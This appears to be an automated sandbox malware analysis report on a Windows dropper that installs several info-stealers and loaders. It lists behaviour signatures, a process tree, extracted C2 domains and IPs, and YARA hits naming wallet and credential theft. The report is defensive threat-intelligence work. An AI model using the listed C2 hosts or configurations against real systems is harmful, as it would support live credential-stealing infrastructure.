Edit tour

Windows Analysis Report
1w5RpHuliE.exe

Overview

General Information

Sample name:	1w5RpHuliE.exe renamed because original name is a hash value
Original sample name:	9bc4c8ecb6d8b3e6b7209067f389cea7.exe
Analysis ID:	1614113
MD5:	9bc4c8ecb6d8b3e6b7209067f389cea7
SHA1:	e316ff6b3b8c2333e303fead5366dab17bf5bedd
SHA256:	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, GCleaner, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected GCleaner

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SmokeLoader

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

.NET source code contains method to dynamically call methods (often used by packers)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

PE file has a writeable .text section

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Tries to resolve many domain names, but no domain seems valid

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

1w5RpHuliE.exe (PID: 5616 cmdline: "C:\Users\user\Desktop\1w5RpHuliE.exe" MD5: 9BC4C8ECB6D8B3E6B7209067F389CEA7)

skotes.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 9BC4C8ECB6D8B3E6B7209067F389CEA7)

skotes.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9BC4C8ECB6D8B3E6B7209067F389CEA7)

skotes.exe (PID: 6468 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9BC4C8ECB6D8B3E6B7209067F389CEA7)

xkV9ZML.exe (PID: 1896 cmdline: "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe" MD5: 439EFB415B14EE2439668D05EB34E520)

xkV9ZML.exe (PID: 6352 cmdline: "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe" MD5: 439EFB415B14EE2439668D05EB34E520)

WerFault.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 1136 MD5: C31336C1EFC2CCB44B4326EA793040F2)

b7b5e2e140.exe (PID: 1672 cmdline: "C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe" MD5: DB3632EF37D9E27DFA2FD76F320540CA)

BitLockerToGo.exe (PID: 6380 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

4dfe6dfd76.exe (PID: 1048 cmdline: "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)

4dfe6dfd76.exe (PID: 2104 cmdline: "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)

4dfe6dfd76.exe (PID: 3752 cmdline: "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)

4dfe6dfd76.exe (PID: 5792 cmdline: "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)

4dfe6dfd76.exe (PID: 1864 cmdline: "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)

4dfe6dfd76.exe (PID: 6252 cmdline: "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)

WerFault.exe (PID: 6108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 956 MD5: C31336C1EFC2CCB44B4326EA793040F2)

b4fe2af6b4.exe (PID: 3608 cmdline: "C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe" MD5: AF1880B2B64FCDF6F6BA12A44AF1BFC8)

d755f09e83.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe" MD5: F071BEEBFF0BCFF843395DC61A8D53C8)

976cb97ff6.exe (PID: 3200 cmdline: "C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe" MD5: AEA58177AC38EFBB1410BC214BBF00CC)

cbf2b6294a.exe (PID: 6340 cmdline: "C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe" MD5: 9BD7D976A1FD7BA97CB2EC7DD5CB96E9)

14b550e5e3.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe" MD5: B5E4D9FA039851C2A09EB679735C6EC3)

BitLockerToGo.exe (PID: 1516 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

rnHV2EM9rK6P.exe (PID: 1244 cmdline: "C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe" MD5: 6AFC990CC660C0B933232BF714CF2218)

rnHV2EM9rK6P.tmp (PID: 1052 cmdline: "C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp" /SL5="$E0240,3792470,56832,C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe" MD5: 5EA27693925CD5CE46817833952E54D6)

filebasedassist.exe (PID: 4144 cmdline: "C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe" -i MD5: 2ED63A2BBB030CD563B8392A09D1A184)

lt8kslFxQ.exe (PID: 1524 cmdline: "C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe" MD5: BF6F9106C35DC89D36997960850AC664)

KbSwZup.exe (PID: 6408 cmdline: "C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe" MD5: C30852886CB5A9C1F956D738A355ED8C)

6761aae677.exe (PID: 3308 cmdline: "C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe" MD5: 685014521DB6FDB69EBB2A8CDC7D64F1)

BitLockerToGo.exe (PID: 5552 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

ViGgA8C.exe (PID: 6044 cmdline: "C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe" MD5: F662CB18E04CC62863751B672570BD7D)

conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Bjkm5hE.exe (PID: 5468 cmdline: "C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe" MD5: 0F2E0A4DAA819B94536F513D8BB3BFE2)

svchost.exe (PID: 2672 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5968 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1896 -ip 1896 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1272 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1048 -ip 1048 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 6764 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
GCleaner		No Attribution	https://bazaar.abuse.ch/browse/signature/GCleaner/ https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/	https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER UAC-0006	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["soulfulimusic.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "vyHxTw--"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: RedLine

{"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1078003001\PqodvBZ.exe	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PqodvBZ[1].exe	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001B.00000002.3192511267.000000000DD5A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001C.00000003.3194955619.000000000130C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.3197107411.000000000DF80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.3110324959.000000000A770000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000002.2751476788.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001E.00000002.3393436751.000000000EAAC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000001B.00000002.3197107411.000000000DFAC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000018.00000002.2947993314.0000000000413000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001E.00000002.3396511396.000000000ECBE000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000E.00000000.2749975380.0000000000952000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000013.00000002.2793676749.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001B.00000003.3145250358.000000000E0BE000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.2099837045.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000002.3393436751.000000000EA80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000001E.00000003.3280018996.000000000ECBE000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000D.00000002.3109758340.000000000A70A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001B.00000002.3197687317.000000000E0BE000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000D.00000003.3068524352.000000000A810000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000003.2086462777.0000000004880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000D.00000002.3110324959.000000000A7C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001B.00000002.3197107411.000000000DFD8000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000001B.00000002.3197107411.000000000DF28000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000001B.00000002.3197107411.000000000DF54000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000002.00000002.2125257135.00000000006F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.2084996675.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001C.00000003.3196348023.000000000130E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
0000001E.00000002.3396257355.000000000EB80000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000D.00000003.3068524352.000000000A7C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001E.00000002.3344956274.000000000E844000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000001B.00000003.3145250358.000000000E02E000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001A.00000002.3118521479.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001E.00000002.3393436751.000000000EAD8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000003.00000002.2127312941.00000000006F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.3197107411.000000000DEFC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000001B.00000002.3197687317.000000000E02E000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000017.00000002.3400586669.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001C.00000002.3257227799.0000000000D61000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000006.00000003.2525381916.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000002.3396257355.000000000EC2E000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2748577375.0000000003919000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000019.00000003.3060883563.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000002.3397348773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000D.00000002.3110324959.000000000A810000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000D.00000003.3068524352.000000000A770000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000016.00000002.2875221579.0000000000521000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000006.00000002.3398024805.00000000006F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000003.3049989282.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000003.3050114694.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: xkV9ZML.exe PID: 6352	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 4dfe6dfd76.exe PID: 6252	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: b4fe2af6b4.exe PID: 3608	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: cbf2b6294a.exe PID: 6340	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: cbf2b6294a.exe PID: 6340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cbf2b6294a.exe PID: 6340	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: KbSwZup.exe PID: 6408	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: KbSwZup.exe PID: 6408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: KbSwZup.exe PID: 6408	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ViGgA8C.exe PID: 6044	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ViGgA8C.exe PID: 6044	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: ViGgA8C.exe PID: 6044	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x3e628:$a4: get_ScannedWallets 0x9c631:$a4: get_ScannedWallets 0x3d4cf:$a5: get_ScanTelegram 0x9b4d8:$a5: get_ScanTelegram 0x3e2b1:$a6: get_ScanGeckoBrowsersPaths 0x9c2ba:$a6: get_ScanGeckoBrowsersPaths 0x3c162:$a7: <Processes>k__BackingField 0x9a16b:$a7: <Processes>k__BackingField 0x39695:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x9769e:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3ba96:$a9: <ScanFTP>k__BackingField 0x99a9f:$a9: <ScanFTP>k__BackingField
Process Memory Space: Bjkm5hE.exe PID: 5468	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 70 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.b7b5e2e140.exe.a770000.3.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
26.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
13.2.b7b5e2e140.exe.a70a000.2.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
13.2.b7b5e2e140.exe.a770000.3.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
27.2.14b550e5e3.exe.defc000.5.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
30.2.6761aae677.exe.ead8000.3.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
31.2.ViGgA8C.exe.e10000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.ViGgA8C.exe.e10000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
